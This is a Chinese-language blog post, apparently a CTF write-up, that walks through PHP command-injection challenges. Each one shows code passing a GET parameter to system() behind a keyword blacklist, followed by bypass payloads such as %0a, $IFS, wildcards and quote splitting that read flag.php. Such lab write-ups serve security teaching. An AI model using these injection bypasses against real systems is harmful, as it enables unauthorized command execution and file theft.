<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 5.4.2">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css" integrity="sha256-Z1K5uhUaJXA7Ll0XrZ/0JhX4lAtZFpT6jkKrEDT0drU=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"example.com","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.14.1","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":{"enable":false,"style":null},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js"></script>

    <meta name="description" content="web入门42if(isset($_GET[‘c’])){  $c&#x3D;$_GET[‘c’];  system($c.” &gt;&#x2F;dev&#x2F;null 2&gt;&amp;1”);}else{  highlight_file(FILE);}shell脚本——&gt;&#x2F;dev&#x2F;null 2&gt;&amp;1 详解含义：&gt;代表重定向到哪&#x2F;dev&#x2F;null空设备文件，所有写入的内容都会丢失，俗称黑洞1">
<meta property="og:type" content="article">
<meta property="og:title" content="命令执行部分题记">
<meta property="og:url" content="http://example.com/2023/02/19/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E9%83%A8%E5%88%86%E9%A2%98%E8%AE%B0/index.html">
<meta property="og:site_name" content="The future is promising">
<meta property="og:description" content="web入门42if(isset($_GET[‘c’])){  $c&#x3D;$_GET[‘c’];  system($c.” &gt;&#x2F;dev&#x2F;null 2&gt;&amp;1”);}else{  highlight_file(FILE);}shell脚本——&gt;&#x2F;dev&#x2F;null 2&gt;&amp;1 详解含义：&gt;代表重定向到哪&#x2F;dev&#x2F;null空设备文件，所有写入的内容都会丢失，俗称黑洞1">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2023-02-19T14:02:12.000Z">
<meta property="article:modified_time" content="2023-02-19T14:21:17.721Z">
<meta property="article:author" content="清者">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://example.com/2023/02/19/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E9%83%A8%E5%88%86%E9%A2%98%E8%AE%B0/">



<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://example.com/2023/02/19/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E9%83%A8%E5%88%86%E9%A2%98%E8%AE%B0/","path":"2023/02/19/命令执行部分题记/","title":"命令执行部分题记"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>命令执行部分题记 | The future is promising</title>
  








  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">The future is promising</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">knowledge is infinite</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup"><div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close" role="button">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#web%E5%85%A5%E9%97%A842"><span class="nav-number">1.</span> <span class="nav-text">web入门42</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web%E5%85%A5%E9%97%A843"><span class="nav-number">2.</span> <span class="nav-text">web入门43</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web%E5%85%A5%E9%97%A844"><span class="nav-number">3.</span> <span class="nav-text">web入门44</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web%E5%85%A5%E9%97%A845"><span class="nav-number">4.</span> <span class="nav-text">web入门45</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web%E5%85%A5%E9%97%A846"><span class="nav-number">5.</span> <span class="nav-text">web入门46</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web%E5%85%A5%E9%97%A848"><span class="nav-number">6.</span> <span class="nav-text">web入门48</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web%E5%85%A5%E9%97%A852"><span class="nav-number">7.</span> <span class="nav-text">web入门52</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#web%E5%85%A5%E9%97%A853"><span class="nav-number">8.</span> <span class="nav-text">web入门53</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="清者"
      src="/images/apple-touch-icon-next.png">
  <p class="site-author-name" itemprop="name">清者</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">19</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/yourname" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;yourname" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="/2834849243@qq.com" title="邮箱 → 2834849243@qq.com" rel="noopener me"><i class="fa fa-envelope fa-fw"></i>邮箱</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://weibo.com/yourname" title="微博 → https:&#x2F;&#x2F;weibo.com&#x2F;yourname" rel="noopener me" target="_blank"><i class="fab fa-weibo fa-fw"></i>微博</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://twitter.com/yourname" title="CSDN → https:&#x2F;&#x2F;twitter.com&#x2F;yourname" rel="noopener me" target="_blank"><i class="fab fa-twitter fa-fw"></i>CSDN</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2023/02/19/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E9%83%A8%E5%88%86%E9%A2%98%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/apple-touch-icon-next.png">
      <meta itemprop="name" content="清者">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="The future is promising">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="命令执行部分题记 | The future is promising">
      <meta itemprop="description" content="">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          命令执行部分题记
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>
      

      <time title="创建时间：2023-02-19 22:02:12 / 修改时间：22:21:17" itemprop="dateCreated datePublished" datetime="2023-02-19T22:02:12+08:00">2023-02-19</time>
    </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="web入门42"><a href="#web入门42" class="headerlink" title="web入门42"></a>web入门42</h2><p>if(isset($_GET[‘c’])){<br>  $c=$_GET[‘c’];<br>  system($c.” &gt;/dev/null 2&gt;&amp;1”);<br>}else{<br>  highlight_file(<strong>FILE</strong>);<br>}<br>shell脚本——&gt;/dev/null 2&gt;&amp;1 详解<br>含义：&gt;代表重定向到哪<br>/dev/null空设备文件，所有写入的内容都会丢失，俗称黑洞<br>1表示stdout标准输出，系统默认值为1，&gt;/dev/null等同于1&gt;/dev/null<br>2表示stderr标准错误<br>&amp;表示等同于，2&gt;&amp;1表示2的输出定向等同于1<br>解释：命令1&gt;/dev/null 首先表示标准输出重定向到空设备文件也就是丢弃标准输出。<br>2&gt;&amp;1 接着，标准错误输出重定向等同于 标准输出，因为之前标准输出已经重定向到了空设备文件，所以标准错误输出也被丢弃。<br>所以该shell命令不会输出任何信息，不回显。<a target="_blank" rel="noopener" href="https://www.cnblogs.com/ultranms/p/9353157.html">https://www.cnblogs.com/ultranms/p/9353157.html</a><br>用 ; 截断<br>url/?c=ls;<br>url/?c=cat flag.php;<br>分隔符<br>；如果每个命令都被一个分号(；)所分隔，那么命令会连续地执行下去<br>&amp;&amp; 执行错误检查命令，如果其左侧的命令不返回预期的结果，其右侧的命令就不会执行<br>&amp; 不执行错误检查和运行所有命令<br>||若遇到可以成功执行的命令，那么命令停止执行，即使后面还有正确的命令。假如命令一开始就执行失败，那么就会执行||后的下一个命令，直到遇到可以成功执行的命令为止，假如所有的都失败，则所有这些失败的命令都会被尝试执行一次<br>|即使遇到可以成功执行的命令，命令也会继续执行下去，并且会显示最后一个命令的执行结果<br>cmd1 | cmd2 只显示cmd2结果<br>cmd1 ; cmd2 无论cmd1是否成功执行，都执行cmd2<br>cmd1 || cmd2 cmd1执行失败时才执行cmd2<br>cmd1 &amp;&amp; cmd2 cmd1执行成功时才执行cmd2</p>
<h2 id="web入门43"><a href="#web入门43" class="headerlink" title="web入门43"></a>web入门43</h2><p>if(isset($_GET[‘c’])){<br>  $c=$_GET[‘c’];<br>  if(!preg_match(“/;|cat/i”, $c)){<br>    system($c.” &gt;/dev/null 2&gt;&amp;1”);<br>  }<br>}else{<br>  highlight_file(<strong>FILE</strong>);<br>}<br>比上一题多了cat ; 过滤<br>执行命令url/?c=tac flag.php%0a<br>或者执行url/?c=nl flag.php%0a 看源码<br>nl命令：输出文件内容并自动加上行号</p>
<h2 id="web入门44"><a href="#web入门44" class="headerlink" title="web入门44"></a>web入门44</h2><p>if(isset($_GET[‘c’])){<br>  $c=$_GET[‘c’];<br>  if(!preg_match(“/;|cat|flag/i”, $c)){<br>    system($c.” &gt;/dev/null 2&gt;&amp;1”);<br>  }<br>}else{<br>  highlight_file(<strong>FILE</strong>);<br>}<br>过滤了; cat flag 用通配符*<br>执行命令url/?c=nl f*.php%0a<br>或url/?c=tac f*.php%0a</p>
<h2 id="web入门45"><a href="#web入门45" class="headerlink" title="web入门45"></a>web入门45</h2><p>if(isset($_GET[‘c’])){<br>  $c=$_GET[‘c’];<br>  if(!preg_match(“/;|cat|flag| /i”, $c)){<br>    system($c.” &gt;/dev/null 2&gt;&amp;1”);<br>  }<br>}else{<br>  highlight_file(<strong>FILE</strong>);<br>}<br>过滤了*; cat flag 空格<br>hint<br>echo$IFS‘tac$IFS<em>’%0A注意反引号<br>``执行系统命令<br>或tac${IFS}f</em>.php%0a<br>或echo${IFS}tac${IFS}f*%0a<br>shell脚本——变量IFS，分隔符<br>作用：shell 根据 IFS 的值，默认是 space, tab, newline 来拆解读入的变量，然后对特殊字符进行处理，最后重新组合赋值给该变量。<br>查看IFS值echo”$IFS<br>$IFS<em>返回所有参数<br>然后输入tac百分号零九f</em>.php百分号零a<br>百分号09是tab的url编码<br>百分号26是&amp;的url编码</p>
<h2 id="web入门46"><a href="#web入门46" class="headerlink" title="web入门46"></a>web入门46</h2><p>过滤了; cat flag * $ [0-9] 空格<br>nl&lt;fla’’g.php|| 小于号可理解为空格，重定向到后面的文件<br>&lt;是输入重定向<a target="_blank" rel="noopener" href="https://www.runoob.com/linux/linux-shell-io-redirections.html">https://www.runoob.com/linux/linux-shell-io-redirections.html</a><br>重定向就是通过各种方法将各种网络请求重新定个方向转到其它位置<br>%09与%0a是url编码，不会当成数字被过滤<br>直接输入/?c=tac%09????????%0a便可得到falg<br>?与*都是通配符，?占一个位置，星号占无数个位置</p>
<h2 id="web入门48"><a href="#web入门48" class="headerlink" title="web入门48"></a>web入门48</h2><p>if(isset($_GET[‘c’])){<br>  $c=$_GET[‘c’];<br>  if(!preg_match(“/;|cat|flag| |[0-9]|\$|*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|`/i”, $c)){<br>    system($c.” &gt;/dev/null 2&gt;&amp;1”);<br>  }<br>}else{<br>  highlight_file(<strong>FILE</strong>);<br>}<br>/?c=nl&lt;fla’’g.php|| 即可</p>
<h2 id="web入门52"><a href="#web入门52" class="headerlink" title="web入门52"></a>web入门52</h2><p>if(isset($_GET[‘c’])){<br>  $c=$_GET[‘c’];<br>  if(!preg_match(“/;|cat|flag| |[0-9]|*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|`|%|\x09|\x26|&gt;|&lt;/i”, $c)){<br>    system($c.” &gt;/dev/null 2&gt;&amp;1”);<br>  }<br>}else{<br>  highlight_file(<strong>FILE</strong>);<br>}<br>这次把&lt; &gt;都过滤了用$IFS<br>若用nl${IFS}fl\ag.php||命令，会出现假flag，发现flag在根目录，用nl${IFS}/fl\ag.php|| 直接读取<br>或nl$IFS/fla”g||(其中的‘’为单引号)</p>
<h2 id="web入门53"><a href="#web入门53" class="headerlink" title="web入门53"></a>web入门53</h2><p>if(isset($_GET[‘c’])){<br>  $c=$_GET[‘c’];<br>  if(!preg_match(“/;|cat|flag| |[0-9]|*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|`|%|\x09|\x26|&gt;|&lt;/i”, $c)){<br>    echo($c);<br>    $d = system($c);<br>    echo “<br>“.$d;<br>  }else{<br>    echo ‘no’;<br>  }<br>}else{<br>  highlight_file(<strong>FILE</strong>);<br>}<br>一定会回显出c,没有&gt;/dev/null 2&gt;&amp;1命令了<br>c”at${IFS}fla”g.php因为cat和flag被过滤了，用”分隔，两个%27也行,或nl${IFS}fla”g.php<br>cat命令实际上运行的也是bin/cat</p>

    </div>

    
    
    

    <footer class="post-footer">

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/02/15/%E9%83%A8%E5%88%86%E9%A2%98%E8%AE%B0/" rel="prev" title="部分题记">
                  <i class="fa fa-chevron-left"></i> 部分题记
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
<!---->

<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">清者</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  





<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"live2d-widget-model-shizuku"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true}});</script></body>
</html>
